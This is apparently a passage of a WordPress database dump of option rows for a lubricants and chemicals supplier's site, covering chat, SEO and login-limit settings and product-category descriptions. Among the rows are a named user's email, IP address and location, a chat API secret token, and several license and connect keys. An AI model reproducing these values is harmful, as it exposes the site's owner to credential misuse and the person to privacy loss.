INSERT INTO `wp_options` VALUES (17867, 'wpem_log', '{"datetime":"2016-09-23T01:19:51+00:00","fqdn":"p3nlwpweb065.shr.prod.phx3.secureserver.net","site_url":"https:\\/\\/c81.bc1.myftpupload.com","account_id":"c81b3601733982","user_email":"ddillulio@mschem.com","locale":"en_US","wp_version":"4.6.1","wpem_version":"2.0.9","geodata":{"city":"Danbury","country_code":"US","country_name":"United States","ip":"107.3.77.7","latitude":"41.378","longitude":"-73.469","postal_code":"06810","region_code":"CT","region_name":"Connecticut","timezone":"America\\/New_York"},"is_fresh_wp":false}', 'yes'); 
INSERT INTO `wp_options` VALUES (17868, 'wpem_opt_out', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17869, 'wpem_done', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17870, 'gd_system_version', '2.3.2', 'yes'); 
INSERT INTO `wp_options` VALUES (18542, 'gd_system_last_login', '1478115522', 'yes'); 
INSERT INTO `wp_options` VALUES (18543, 'gd_system_first_login', '1474630490', 'yes'); 
INSERT INTO `wp_options` VALUES (18544, 'gd_system_last_cache_flush', '1478172841', 'no'); 
INSERT INTO `wp_options` VALUES (18559, 'gd_system_last_publish', '1478115611', 'yes'); 
INSERT INTO `wp_options` VALUES (18560, 'gd_system_first_publish', '1474631167', 'yes'); 
INSERT INTO `wp_options` VALUES (18568, 'U_S_C', 'a:9:{s:9:"b_massage";s:0:"";s:10:"list_users";b:1;s:10:"list_roles";b:1;s:18:"run_on_the_content";b:1;s:18:"run_on_the_excerpt";b:0;s:9:"posttypes";a:2:{s:4:"post";b:1;s:4:"page";b:1;}s:10:"capability";s:14:"manage_options";s:19:"user_role_list_type";s:8:"checkbox";s:14:"user_list_type";s:8:"checkbox";}', 'yes'); 
INSERT INTO `wp_options` VALUES (18609, 'limit_login_retries', 'a:0:{}', 'no'); 
INSERT INTO `wp_options` VALUES (18610, 'limit_login_retries_valid', 'a:0:{}', 'no'); 
INSERT INTO `wp_options` VALUES (18611, 'limit_login_lockouts', 'a:1:{s:10:"52.78.19.5";i:1478119524;}', 'yes'); 
INSERT INTO `wp_options` VALUES (18612, 'limit_login_lockouts_total', '24215', 'no'); 
INSERT INTO `wp_options` VALUES (18929, 'wpaas_file_editor_enabled', '1', 'no'); 
INSERT INTO `wp_options` VALUES (20442, 'wplc_db_version', '6.2.09', 'yes'); 
INSERT INTO `wp_options` VALUES (20443, 'WPLC_SETTINGS', 'a:37:{s:19:"wplc_settings_align";s:1:"2";s:16:"wplc_environment";s:1:"1";s:20:"wplc_settings_color1";s:6:"ED832F";s:18:"wplc_settings_fill";s:6:"ED832F";s:20:"wplc_settings_color2";s:6:"FFFFFF";s:18:"wplc_settings_font";s:6:"FFFFFF";s:20:"wplc_settings_color3";s:6:"EEEEEE";s:20:"wplc_settings_color4";s:6:"666666";s:21:"wplc_settings_enabled";s:1:"1";s:22:"wplc_require_user_info";s:1:"1";s:23:"wplc_loggedin_user_info";s:1:"1";s:26:"wplc_user_alternative_text";s:70:"Please click \\&#039;Start Chat\\&#039; to initiate a chat with an agent";s:22:"wplc_enabled_on_mobile";s:1:"1";s:17:"wplc_display_name";s:1:"1";s:22:"wplc_record_ip_address";s:1:"1";s:21:"wplc_enable_msg_sound";s:1:"1";s:11:"wplc_pro_na";s:29:"Chat offline. Leave a message";s:27:"wplc_pro_chat_email_address";s:0:"";s:17:"wplc_pro_offline1";s:89:"We are currently offline. Please leave a message and we\\&#039;ll get back to you shortly.";s:17:"wplc_pro_offline2";s:18:"Sending message...";s:17:"wplc_pro_offline3";s:55:"Thank you for your message. We will be in contact soon.";s:13:"wplc_pro_fst1";s:10:"Questions?";s:13:"wplc_pro_fst2";s:12:"Chat with us";s:13:"wplc_pro_sst1";s:10:"Start Chat";s:20:"wplc_pro_sst1_survey";s:23:"Or chat to an agent now";s:21:"wplc_pro_sst1e_survey";s:10:"Chat ended";s:13:"wplc_pro_sst2";s:32:"Connecting. Please be patient...";s:13:"wplc_pro_tst1";s:34:"Reactivating your previous chat...";s:14:"wplc_pro_intro";s:56:"Hello. Please input your details so that I may help you.";s:15:"wplc_user_enter";s:32:"Press ENTER to send your message";s:22:"wplc_user_welcome_chat";s:28:"Welcome. How may I help you?";s:10:"wplc_theme";s:7:"theme-4";s:13:"wplc_newtheme";s:7:"theme-2";s:24:"wplc_elem_trigger_action";s:1:"0";s:22:"wplc_elem_trigger_type";s:1:"0";s:20:"wplc_elem_trigger_id";s:0:"";s:13:"wplc_pro_fst3";s:15:"Start live chat";}', 'yes'); 
INSERT INTO `wp_options` VALUES (20444, 'WPLC_HIDE_CHAT', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20445, 'WPLC_FIRST_TIME', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20446, 'wplc_api_secret_token', 'c405a37d6790479a43b85350f9ea56c6', 'yes'); 
INSERT INTO `wp_options` VALUES (20447, 'wplc_current_version', '6.2.09', 'yes'); 
INSERT INTO `wp_options` VALUES (20456, 'wplc_stats', 'a:3:{s:8:"settings";a:3:{s:5:"views";i:4;s:13:"last_accessed";s:19:"2016-09-23 19:54:37";s:14:"first_accessed";s:19:"2016-09-23 19:50:13";}s:7:"surveys";a:3:{s:5:"views";i:1;s:13:"last_accessed";s:19:"2016-09-23 19:51:09";s:14:"first_accessed";s:19:"2016-09-23 19:51:09";}s:14:"chat_dashboard";a:3:{s:5:"views";i:6;s:13:"last_accessed";s:19:"2016-09-23 19:58:05";s:14:"first_accessed";s:19:"2016-09-23 19:51:26";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (20462, 'wplc_seen_surveys', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (20463, 'WPLC_SURVEY_SETTINGS', 'a:4:{s:19:"wplc_enable_surveys";i:0;s:6:"survey";N;s:11:"survey_user";N;s:14:"survey_display";s:1:"1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (20464, 'WPLC_BANNED_IP_ADDRESSES', 's:17:"a:1:{i:0;s:0:"";}";', 'yes'); 
INSERT INTO `wp_options` VALUES (20465, 'wplc_advanced_settings', 'a:2:{s:15:"wplc_iterations";s:2:"55";s:24:"wplc_delay_between_loops";s:6:"500000";}', 'yes'); 
INSERT INTO `wp_options` VALUES (20466, 'wplc_mail_type', 'wp_mail', 'yes'); 
INSERT INTO `wp_options` VALUES (20467, 'wplc_mail_host', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20468, 'wplc_mail_port', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20469, 'wplc_mail_username', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20470, 'wplc_mail_password', '', 'yes'); 
INSERT INTO `wp_options` VALUES (20502, 'support_page_options', 'a:14:{s:11:"enable_chat";s:3:"yes";s:13:"input_replace";s:20:"Type Your Message...";s:10:"ip_address";s:3:"yes";s:10:"sound_play";s:3:"yes";s:13:"sound_to_play";s:8:"noti.mp3";s:9:"emoticons";s:3:"yes";s:11:"attachments";s:3:"yes";s:17:"chatbox_alignment";s:12:"bottom_right";s:15:"name_to_display";s:5:"Admin";s:15:"text_to_display";s:34:"Any Query ? Please send Us Message";s:19:"select_colour_theme";s:13:"theme_default";s:12:"color_scheme";s:17:"clr_shade_default";s:12:"offline_chat";s:2:"no";s:19:"change_color_scheme";s:2:"no";}', 'yes'); 
INSERT INTO `wp_options` VALUES (21588, 'cas_widget_type', 'inline', 'yes'); 
INSERT INTO `wp_options` VALUES (21589, 'cas_widget_pos', 'bottom-right', 'yes'); 
INSERT INTO `wp_options` VALUES (21590, 'cas_widget_domain', 'https://www.miller-stephenson.com/', 'yes'); 
INSERT INTO `wp_options` VALUES (21591, 'cas_widget_label', 'Live Support', 'yes'); 
INSERT INTO `wp_options` VALUES (21592, 'cas_widget_theme', 'blue', 'yes'); 
INSERT INTO `wp_options` VALUES (21593, 'cas_widget_lang', 'en_US', 'yes'); 
INSERT INTO `wp_options` VALUES (21594, 'cas_widget_lang_id', '', 'yes'); 
INSERT INTO `wp_options` VALUES (21602, 'livechat_license_number', '8256911', 'yes'); 
INSERT INTO `wp_options` VALUES (23677, 'wpseo', 'a:23:{s:14:"blocking_files";a:0:{}s:15:"ms_defaults_set";b:0;s:7:"version";s:3:"4.1";s:12:"company_logo";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:12:"company_name";s:36:"M-S Lubricants, Oils, Release Agents";s:17:"company_or_person";s:7:"company";s:20:"disableadvanced_meta";b:1;s:19:"onpage_indexability";b:1;s:12:"googleverify";s:0:"";s:8:"msverify";s:32:"CD85D021E067477AE710343E45B533C6";s:11:"person_name";s:0:"";s:12:"website_name";s:36:"M-S Lubricants, Oils, Release Agents";s:22:"alternate_website_name";s:0:"";s:12:"yandexverify";s:0:"";s:9:"site_type";s:0:"";s:20:"has_multiple_authors";b:0;s:16:"environment_type";s:0:"";s:20:"enable_setting_pages";b:1;s:21:"enable_admin_bar_menu";b:1;s:22:"show_onboarding_notice";b:0;s:18:"first_activated_on";i:1475083483;s:23:"enable_metabox_insights";b:1;s:23:"enable_link_suggestions";b:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (23678, 'wpseo_permalinks', 'a:9:{s:15:"cleanpermalinks";b:0;s:24:"cleanpermalink-extravars";s:0:"";s:29:"cleanpermalink-googlecampaign";b:0;s:31:"cleanpermalink-googlesitesearch";b:0;s:15:"cleanreplytocom";b:0;s:10:"cleanslugs";b:1;s:18:"redirectattachment";b:0;s:17:"stripcategorybase";b:0;s:13:"trailingslash";b:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (23679, 'wpseo_titles', 'a:123:{s:10:"title_test";i:0;s:17:"forcerewritetitle";b:0;s:23:"content-analysis-active";b:1;s:23:"keyword-analysis-active";b:1;s:9:"separator";s:7:"sc-dash";s:5:"noodp";b:0;s:15:"usemetakeywords";b:0;s:16:"title-home-wpseo";s:42:"%%sitename%% %%page%% %%sep%% %%sitedesc%%";s:18:"title-author-wpseo";s:41:"%%name%%, Author at %%sitename%% %%page%%";s:19:"title-archive-wpseo";s:38:"%%date%% %%page%% %%sep%% %%sitename%%";s:18:"title-search-wpseo";s:63:"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%";s:15:"title-404-wpseo";s:35:"Page not found %%sep%% %%sitename%%";s:19:"metadesc-home-wpseo";s:0:"";s:21:"metadesc-author-wpseo";s:0:"";s:22:"metadesc-archive-wpseo";s:0:"";s:18:"metakey-home-wpseo";s:0:"";s:20:"metakey-author-wpseo";s:0:"";s:22:"noindex-subpages-wpseo";b:0;s:20:"noindex-author-wpseo";b:0;s:21:"noindex-archive-wpseo";b:1;s:14:"disable-author";b:0;s:12:"disable-date";b:0;s:19:"disable-post_format";b:0;s:10:"title-post";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:13:"metadesc-post";s:0:"";s:12:"metakey-post";s:0:"";s:12:"noindex-post";b:0;s:13:"showdate-post";b:0;s:16:"hideeditbox-post";b:0;s:10:"title-page";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:13:"metadesc-page";s:0:"";s:12:"metakey-page";s:0:"";s:12:"noindex-page";b:0;s:13:"showdate-page";b:0;s:16:"hideeditbox-page";b:0;s:16:"title-attachment";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:19:"metadesc-attachment";s:0:"";s:18:"metakey-attachment";s:0:"";s:18:"noindex-attachment";b:0;s:19:"showdate-attachment";b:0;s:22:"hideeditbox-attachment";b:0;s:18:"title-tax-category";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:21:"metadesc-tax-category";s:0:"";s:20:"metakey-tax-category";s:0:"";s:24:"hideeditbox-tax-category";b:0;s:20:"noindex-tax-category";b:0;s:18:"title-tax-post_tag";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:21:"metadesc-tax-post_tag";s:0:"";s:20:"metakey-tax-post_tag";s:0:"";s:24:"hideeditbox-tax-post_tag";b:0;s:20:"noindex-tax-post_tag";b:1;s:21:"title-tax-post_format";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:24:"metadesc-tax-post_format";s:0:"";s:23:"metakey-tax-post_format";s:0:"";s:27:"hideeditbox-tax-post_format";b:0;s:23:"noindex-tax-post_format";b:1;s:12:"title-blocks";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:15:"metadesc-blocks";s:0:"";s:14:"metakey-blocks";s:0:"";s:14:"noindex-blocks";b:0;s:15:"showdate-blocks";b:0;s:18:"hideeditbox-blocks";b:0;s:13:"title-product";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:16:"metadesc-product";s:0:"";s:15:"metakey-product";s:0:"";s:15:"noindex-product";b:0;s:16:"showdate-product";b:0;s:19:"hideeditbox-product";b:0;s:19:"title-featured_item";s:39:"%%title%% %%page%% %%sep%% %%sitename%%";s:22:"metadesc-featured_item";s:0:"";s:21:"metakey-featured_item";s:0:"";s:21:"noindex-featured_item";b:0;s:22:"showdate-featured_item";b:0;s:25:"hideeditbox-featured_item";b:0;s:22:"title-ptarchive-blocks";s:43:"%%pt_plural%% %%page%% %%sep%% %%sitename%%";s:25:"metadesc-ptarchive-blocks";s:0:"";s:24:"metakey-ptarchive-blocks";s:0:"";s:24:"bctitle-ptarchive-blocks";s:0:"";s:24:"noindex-ptarchive-blocks";b:0;s:23:"title-ptarchive-product";s:43:"%%pt_plural%% %%page%% %%sep%% %%sitename%%";s:26:"metadesc-ptarchive-product";s:0:"";s:25:"metakey-ptarchive-product";s:0:"";s:25:"bctitle-ptarchive-product";s:0:"";s:25:"noindex-ptarchive-product";b:0;s:29:"title-ptarchive-featured_item";s:43:"%%pt_plural%% %%page%% %%sep%% %%sitename%%";s:32:"metadesc-ptarchive-featured_item";s:0:"";s:31:"metakey-ptarchive-featured_item";s:0:"";s:31:"bctitle-ptarchive-featured_item";s:0:"";s:31:"noindex-ptarchive-featured_item";b:0;s:21:"title-tax-product_cat";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:24:"metadesc-tax-product_cat";s:0:"";s:23:"metakey-tax-product_cat";s:0:"";s:27:"hideeditbox-tax-product_cat";b:0;s:23:"noindex-tax-product_cat";b:0;s:21:"title-tax-product_tag";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:24:"metadesc-tax-product_tag";s:0:"";s:23:"metakey-tax-product_tag";s:0:"";s:27:"hideeditbox-tax-product_tag";b:0;s:23:"noindex-tax-product_tag";b:1;s:32:"title-tax-product_shipping_class";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:35:"metadesc-tax-product_shipping_class";s:0:"";s:34:"metakey-tax-product_shipping_class";s:0:"";s:38:"hideeditbox-tax-product_shipping_class";b:0;s:34:"noindex-tax-product_shipping_class";b:0;s:32:"title-tax-featured_item_category";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:35:"metadesc-tax-featured_item_category";s:0:"";s:34:"metakey-tax-featured_item_category";s:0:"";s:38:"hideeditbox-tax-featured_item_category";b:0;s:34:"noindex-tax-featured_item_category";b:0;s:27:"title-tax-featured_item_tag";s:52:"%%term_title%% Catalog %%page%% %%sep%% %%sitename%%";s:30:"metadesc-tax-featured_item_tag";s:0:"";s:29:"metakey-tax-featured_item_tag";s:0:"";s:33:"hideeditbox-tax-featured_item_tag";b:0;s:29:"noindex-tax-featured_item_tag";b:1;s:23:"page-analyse-extra-post";s:0:"";s:23:"page-analyse-extra-page";s:0:"";s:29:"page-analyse-extra-attachment";s:0:"";s:25:"page-analyse-extra-blocks";s:0:"";s:26:"page-analyse-extra-product";s:0:"";s:32:"page-analyse-extra-featured_item";s:0:"";s:23:"title-ptarchive-sidebar";s:0:"";s:26:"metadesc-ptarchive-sidebar";s:0:"";s:25:"noindex-ptarchive-sidebar";s:3:"off";}', 'yes'); 
INSERT INTO `wp_options` VALUES (23680, 'wpseo_social', 'a:20:{s:9:"fb_admins";a:0:{}s:12:"fbconnectkey";s:32:"c54a3cd34c69637961692584bbed15ac";s:13:"facebook_site";s:84:"https://www.facebook.com/Miller-Stephenson-Chemical-Co-Inc-1608764212697010/?fref=ts";s:13:"instagram_url";s:0:"";s:12:"linkedin_url";s:67:"https://www.linkedin.com/company/miller-stephenson-chemical-company";s:11:"myspace_url";s:0:"";s:16:"og_default_image";s:0:"";s:18:"og_frontpage_title";s:0:"";s:17:"og_frontpage_desc";s:0:"";s:18:"og_frontpage_image";s:0:"";s:9:"opengraph";b:1;s:13:"pinterest_url";s:0:"";s:15:"pinterestverify";s:0:"";s:14:"plus-publisher";s:45:"https://plus.google.com/105252144916647489581";s:7:"twitter";b:1;s:12:"twitter_site";s:11:"MSChemicals";s:17:"twitter_card_type";s:7:"summary";s:11:"youtube_url";s:0:"";s:15:"google_plus_url";s:45:"https://plus.google.com/105252144916647489581";s:10:"fbadminapp";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (23681, 'wpseo_rss', 'a:2:{s:9:"rssbefore";s:0:"";s:8:"rssafter";s:53:"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.";}', 'yes'); 
INSERT INTO `wp_options` VALUES (23682, 'wpseo_internallinks', 'a:18:{s:20:"breadcrumbs-404crumb";s:25:"Error 404: Page not found";s:23:"breadcrumbs-blog-remove";b:0;s:20:"breadcrumbs-boldlast";b:0;s:25:"breadcrumbs-archiveprefix";s:12:"Archives for";s:18:"breadcrumbs-enable";b:0;s:16:"breadcrumbs-home";s:4:"Home";s:18:"breadcrumbs-prefix";s:0:"";s:24:"breadcrumbs-searchprefix";s:16:"You searched for";s:15:"breadcrumbs-sep";s:7:"&raquo;";s:23:"post_types-post-maintax";i:0;s:25:"post_types-blocks-maintax";i:0;s:26:"post_types-product-maintax";i:0;s:32:"post_types-featured_item-maintax";i:0;s:29:"taxonomy-product_cat-ptparent";i:0;s:29:"taxonomy-product_tag-ptparent";i:0;s:40:"taxonomy-product_shipping_class-ptparent";i:0;s:40:"taxonomy-featured_item_category-ptparent";i:0;s:35:"taxonomy-featured_item_tag-ptparent";i:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (23683, 'wpseo_xml', 'a:27:{s:22:"disable_author_sitemap";b:1;s:22:"disable_author_noposts";b:1;s:16:"enablexmlsitemap";b:1;s:16:"entries-per-page";i:1000;s:14:"excluded-posts";s:0:"";s:38:"user_role-administrator-not_in_sitemap";b:0;s:31:"user_role-editor-not_in_sitemap";b:0;s:31:"user_role-author-not_in_sitemap";b:0;s:36:"user_role-contributor-not_in_sitemap";b:0;s:35:"user_role-subscriber-not_in_sitemap";b:0;s:33:"user_role-customer-not_in_sitemap";b:0;s:37:"user_role-shop_manager-not_in_sitemap";b:0;s:30:"user_role-agent-not_in_sitemap";b:0;s:30:"post_types-post-not_in_sitemap";b:0;s:30:"post_types-page-not_in_sitemap";b:0;s:36:"post_types-attachment-not_in_sitemap";b:0;s:34:"taxonomies-category-not_in_sitemap";b:0;s:34:"taxonomies-post_tag-not_in_sitemap";b:0;s:37:"taxonomies-post_format-not_in_sitemap";b:0;s:32:"post_types-blocks-not_in_sitemap";b:0;s:33:"post_types-product-not_in_sitemap";b:0;s:39:"post_types-featured_item-not_in_sitemap";b:0;s:37:"taxonomies-product_cat-not_in_sitemap";b:0;s:37:"taxonomies-product_tag-not_in_sitemap";b:0;s:48:"taxonomies-product_shipping_class-not_in_sitemap";b:0;s:48:"taxonomies-featured_item_category-not_in_sitemap";b:0;s:43:"taxonomies-featured_item_tag-not_in_sitemap";b:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (23684, 'wpseo_flush_rewrite', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (23689, 'wpseo_sitemap_1_cache_validator', 'oJK5', 'no'); 
INSERT INTO `wp_options` VALUES (23690, 'wpseo_sitemap_attachment_cache_validator', '5HUrc', 'no'); 
INSERT INTO `wp_options` VALUES (23693, 'wpseo_sitemap_cache_validator_global', 'wFYf', 'no'); 
INSERT INTO `wp_options` VALUES (23756, 'wpseo_sitemap_nf_sub_cache_validator', 'wrEJ', 'no'); 
INSERT INTO `wp_options` VALUES (23759, 'wpseo_sitemap_page_cache_validator', '578qc', 'no'); 
INSERT INTO `wp_options` VALUES (23760, 'wpseo_sitemap_revision_cache_validator', '4EZ4t', 'no'); 
INSERT INTO `wp_options` VALUES (24405, 'yoast-seo-premium_license', 'a:3:{s:3:"key";s:32:"aae74b93b8a5d5e841fed44754e0f2a8";s:6:"status";s:5:"valid";s:11:"expiry_date";s:19:"2017-09-26 23:59:59";}', 'yes'); 
INSERT INTO `wp_options` VALUES (24406, 'wpseo_current_version', '16', 'no'); 
INSERT INTO `wp_options` VALUES (24407, 'wpseo_premium_version', '4.1', 'yes'); 
INSERT INTO `wp_options` VALUES (24423, 'wpseo_taxonomy_meta', 'a:2:{s:11:"product_cat";a:64:{i:171;a:5:{s:11:"wpseo_title";s:50:"Other Krytox GPL Grease General Purpose Lubricants";s:10:"wpseo_desc";s:146:"A list of Krytox GPL grease for specialized applications from high heat lubricants to gear box lubricants. These greases are specially formulated.";s:13:"wpseo_focuskw";s:17:"Krytox GPL Grease";s:13:"wpseo_linkdex";s:2:"44";s:19:"wpseo_content_score";s:2:"30";}i:149;a:6:{s:11:"wpseo_title";s:49:"Krytox & Lubricants - Miller-Stephenson Chemicals";s:10:"wpseo_desc";s:146:"Krytox and other lubricants designed to meet the demands of the industrial sector. We serve all industries and cater to the needs of the customer.";s:13:"wpseo_focuskw";s:10:"Lubricants";s:13:"wpseo_linkdex";s:2:"90";s:19:"wpseo_content_score";s:2:"30";s:21:"wpseo_opengraph-image";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-and-lubricants.jpg";}i:12;a:5:{s:11:"wpseo_title";s:72:"Miller-Stephenson Medical Chemicals |Medical Coatings |Additives|Solvent";s:10:"wpseo_desc";s:152:"Miller-Stephenson\'s specialty medical chemicals offer exceptional quality, value, reliability and ultra pure chemical solutions to the medical industry.";s:13:"wpseo_focuskw";s:17:"Medical Chemicals";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:9;a:5:{s:11:"wpseo_title";s:58:"Krytox Lubricants Miller-Stephenson Authorized Distributor";s:10:"wpseo_desc";s:137:"Originally developed for the U.S. Space Program, Krytox Lubricants are a family of fluorinated synthetic oils and PTFE thickened greases.";s:13:"wpseo_focuskw";s:17:"Krytox Lubricants";s:13:"wpseo_linkdex";s:2:"90";s:19:"wpseo_content_score";s:2:"30";}i:151;a:5:{s:11:"wpseo_title";s:56:"TriboSys Lubricants - Miller-Stephenson Chemical Company";s:10:"wpseo_desc";s:158:"Miller-Stephenson’s TriboSys Lubricants are a line of industrial, medical, and food-grade lubricants. Our lubricants offer superior lubricity and longevity.";s:13:"wpseo_focuskw";s:19:"TriboSys Lubricants";s:13:"wpseo_linkdex";s:2:"70";s:19:"wpseo_content_score";s:2:"30";}i:150;a:5:{s:11:"wpseo_title";s:75:"DuPont™ Teflon Lubricants | Industrial Lubricants | Lubricant and Greases";s:10:"wpseo_desc";s:147:"DuPont™ series of industrial and commercial Teflon lubricants, fortified with proprietary additives to greatly enhance performance and longevity.";s:13:"wpseo_focuskw";s:17:"Teflon Lubricants";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:46;a:5:{s:11:"wpseo_title";s:48:"Krytox GPL Greases - Miller-Stephenson Chemicals";s:10:"wpseo_desc";s:144:"Krytox GPL greases are general purpose lubricants used on bearings,valves, hinges and other moving parts where regular greases are insufficient.";s:13:"wpseo_focuskw";s:18:"Krytox GPL Greases";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:99;a:5:{s:11:"wpseo_title";s:56:"Krytox 240 Series Aerospace & Aviation Greases - MIL PRF";s:10:"wpseo_desc";s:154:"Krytox 240 series greases are white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are a grease.";s:13:"wpseo_focuskw";s:10:"Krytox 240";s:13:"wpseo_linkdex";s:2:"94";s:19:"wpseo_content_score";s:2:"30";}i:45;a:5:{s:11:"wpseo_title";s:58:"Krytox GPL Oils General Purpose Fluorinated Synthetic Oils";s:10:"wpseo_desc";s:152:"Krytox GPL Oils 100–107 oils are clear, colorless, fluorinated synthetic oils that are nonreactive, nonflammable, safe in chemical and oxygen service.";s:13:"wpseo_focuskw";s:15:"Krytox GPL Oils";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:86;a:5:{s:11:"wpseo_title";s:55:"Krytox Aerospace & Aviation Greases - Miller-Stephenson";s:10:"wpseo_desc";s:149:"Krytox Aerospace & Aviation Greases are specially formulated for those in the Aerospace & Aviation industry. MIL PRF specification greases available.";s:13:"wpseo_focuskw";s:27:"Krytox Aerospace & Aviation";s:13:"wpseo_linkdex";s:2:"93";s:19:"wpseo_content_score";s:2:"30";}i:100;a:5:{s:11:"wpseo_title";s:56:"Krytox 250 Extreme Pressure Aerospace & Aviation Greases";s:10:"wpseo_desc";s:134:"Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for high loads.";s:13:"wpseo_focuskw";s:10:"Krytox 250";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:101;a:5:{s:11:"wpseo_title";s:60:"Krytox 283 Series Anticorrosion Aviation & Aerospace Greases";s:10:"wpseo_desc";s:152:"Krytox 283 series anticorrosion greases are contain sodium nitrite. These grades provide rust protection, corrosion protection and anti-wear protection.";s:13:"wpseo_focuskw";s:10:"Krytox 283";s:13:"wpseo_linkdex";s:2:"70";s:19:"wpseo_content_score";s:2:"30";}i:97;a:5:{s:11:"wpseo_title";s:55:"Krytox GPL Extreme Pressure 210-217 EP Additive Greases";s:10:"wpseo_desc";s:137:"Krytox GPL Extreme Pressure 210–217 greases are black greases that contain molybdenum disulfide added as an extreme pressure additive..";s:13:"wpseo_focuskw";s:27:"Krytox GPL Extreme Pressure";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:98;a:5:{s:11:"wpseo_title";s:58:"Krytox Anticorrosion GPL 220-227 | Rust Protection Greases";s:10:"wpseo_desc";s:149:"Krytox anticorrosion GPL 220-227 greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.";s:13:"wpseo_focuskw";s:20:"Krytox Anticorrosion";s:13:"wpseo_linkdex";s:2:"94";s:19:"wpseo_content_score";s:2:"30";}i:156;a:5:{s:11:"wpseo_title";s:46:"Krytox EG Electronic Grade Fluorinated Greases";s:10:"wpseo_desc";s:139:"Krytox EG greases are non-reactive and non-flammable. They have the same properties as the 143 series oil but thickened into a grease form.";s:13:"wpseo_focuskw";s:9:"Krytox EG";s:13:"wpseo_linkdex";s:2:"40";s:19:"wpseo_content_score";s:2:"90";}i:165;a:5:{s:11:"wpseo_title";s:75:"Krytox TS4 Thread Sealant - PTFE Tape Replacement - Superior to Teflon Tape";s:10:"wpseo_desc";s:155:"Krytox TS4 thread sealant, the solution for demanding applications, is designed for use on a variety of metal and plastic surfaces. Superior to Teflon Tape";s:13:"wpseo_focuskw";s:3:"TS4";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:13;a:5:{s:11:"wpseo_title";s:73:"VAZO Radical Initiators | Azo Polymerizaton Initiator | Polymer Synthesis";s:10:"wpseo_desc";s:147:"Vazo radical initiators are substituted azonitrile compounds that decompose to generate two free radicals per molecule and initiate polymerization.";s:13:"wpseo_focuskw";s:23:"VAZO radical initiators";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:232;a:5:{s:11:"wpseo_title";s:64:"Vertrel Specialty Fluids & Flux Removers | Nonflammable Solvents";s:10:"wpseo_desc";s:156:"Vertrel specialty fluids are a family of nonflammable, versatile fluids that can be used in many applications. n-propyl bromide trichloroethyene replacement";s:13:"wpseo_focuskw";s:7:"Vertrel";s:13:"wpseo_linkdex";s:2:"74";s:19:"wpseo_content_score";s:2:"30";}i:40;a:5:{s:11:"wpseo_title";s:51:"Krytox XHT Series - High Temperature Greases & Oils";s:10:"wpseo_desc";s:150:"Krytox XHT grades that offer anti-corrosion, extra bonding, and non-melting properties, these lubricants have applications in a variety of industries.";s:13:"wpseo_focuskw";s:10:"Krytox XHT";s:13:"wpseo_linkdex";s:3:"100";s:19:"wpseo_content_score";s:2:"30";}i:115;a:5:{s:11:"wpseo_title";s:57:"Krytox XHT Grease - Special High Temperature Applications";s:10:"wpseo_desc";s:141:"Krytox XHT Grease come in 3 different forms. The XHT-BD series, the XHT-AC series and the XHT-S series. Each one serves a different function.";s:13:"wpseo_focuskw";s:17:"Krytox XHT Grease";s:13:"wpseo_linkdex";s:2:"96";s:19:"wpseo_content_score";s:2:"30";}i:122;a:5:{s:11:"wpseo_title";s:55:"Krytox XHT-AC - Anticorrosion - High Performance Grease";s:10:"wpseo_desc";s:146:"The Krytox XHT-AC series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance.";s:13:"wpseo_focuskw";s:13:"Krytox XHT-AC";s:13:"wpseo_linkdex";s:2:"96";s:19:"wpseo_content_score";s:2:"30";}i:37;a:5:{s:11:"wpseo_title";s:55:"Krytox AUT Series Automotive Greases - High Performance";s:10:"wpseo_desc";s:148:"Krytox AUT Series is a line of products designed to address the automotive industry’s need for lubricants that combine efficiency and performance.";s:13:"wpseo_focuskw";s:10:"Krytox AUT";s:13:"wpseo_linkdex";s:2:"94";s:19:"wpseo_content_score";s:2:"30";}i:38;a:5:{s:11:"wpseo_title";s:43:"Krytox VPF / LVP 